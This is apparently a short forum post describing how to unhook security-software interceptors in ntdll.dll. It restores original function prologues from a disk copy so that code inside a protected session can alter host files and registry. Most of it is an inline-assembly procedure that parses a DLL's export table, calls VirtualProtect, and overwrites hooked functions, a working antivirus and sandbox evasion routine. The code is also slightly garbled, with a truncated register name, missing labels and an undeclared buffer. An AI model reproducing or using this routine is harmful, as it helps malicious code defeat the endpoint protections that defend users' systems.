It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).
Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system.
procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
mov eax, [mapped_dll_base]
mov ecx, [eax+3Ch]
mov edx, [mapped_dll_base]
lea eax, [edx+ecx+18h]
mov [var_10], eax
mov ecx, [var_10]
mov edx, [mapped_dll_base]
add edx, [ecx+60h]
mov [var_4], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+1Ch]
mov [var_8], ecx
mov ecx, [var_4]
mov edx, [mapped_dll_base]
add edx, [ecx+20h]
mov [var_20], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+24h]
mov [var_2C], ec
push dllname
call LoadLibrary
mov [var_28], eax
cmp [var_28], 0
jne @loc_41D111
jmp @ending
mov [var_24], 0
jmp @loc_41D135
mov eax, [var_24]
add eax, 1
mov [var_24], eax
mov ecx, [var_20]
add ecx, 4
mov [var_20], ecx
mov edx, [var_2C]
add edx, 2
mov [var_2C], edx
mov eax, [var_4]
mov ecx, [var_24]
cmp ecx, [eax+18h]
jnb @ending
mov ecx, [var_24]
mov edx, [var_20]
mov eax, [mapped_dll_base]
add eax, [edx]
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [var_28]
add eax, [edx+ecx*4]
mov [var_3C], eax
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [mapped_dll_base]
add eax, [edx+ecx*4]
mov [Src], eax
push 0Ah
mov ecx, [Src]
push ecx
lea edx, [Dst]
push edx
call memcpy
add esp, 0Ch
lea eax, [old]
push eax
push 0Ah
mov eax, [var_3C]
push eax
call VirtualProtect
push 0Ah
lea ecx, [Dst]
push ecx
mov eax, [var_3C]
push eax
call memcpy
add esp, 0Ch
jmp @loc_41D11A